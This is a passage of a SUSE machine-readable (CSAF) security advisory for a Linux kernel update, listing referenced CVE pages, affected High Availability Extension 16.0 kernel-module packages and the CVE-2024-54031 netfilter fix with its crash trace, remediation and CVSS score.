"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68368 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68368/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68374/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68376 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68376/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68735 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68735/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68741 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68741/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68743 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68743/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68778 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68778/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68784 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68792 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68792/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68799 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68799/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68811 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68811/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68821 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68821/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68822 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68822/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71073 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71113 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71113/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71126 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71126/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71148 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71148/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22981 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22981/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22982 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22982/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22986 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22986/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22989 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22989/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23002 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23002/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-27T11:32:45Z",
"generator": {
"date": "2026-02-27T11:32:45Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20615-1",
"initial_release_date": "2026-02-27T11:32:45Z",
"revision_history": [
{
"date": "2026-02-27T11:32:45Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.s390x"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "dlm-kmp-default-6.12.0-160000.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"product_id": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Availability Extension 16.0",
"product": {
"name": "SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-ha:16.0"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dlm-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.s390x as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64 as component of SUSE Linux Enterprise High Availability Extension 16.0",
"product_id": "SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
},
"product_reference": "gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Availability Extension 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocumentation it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
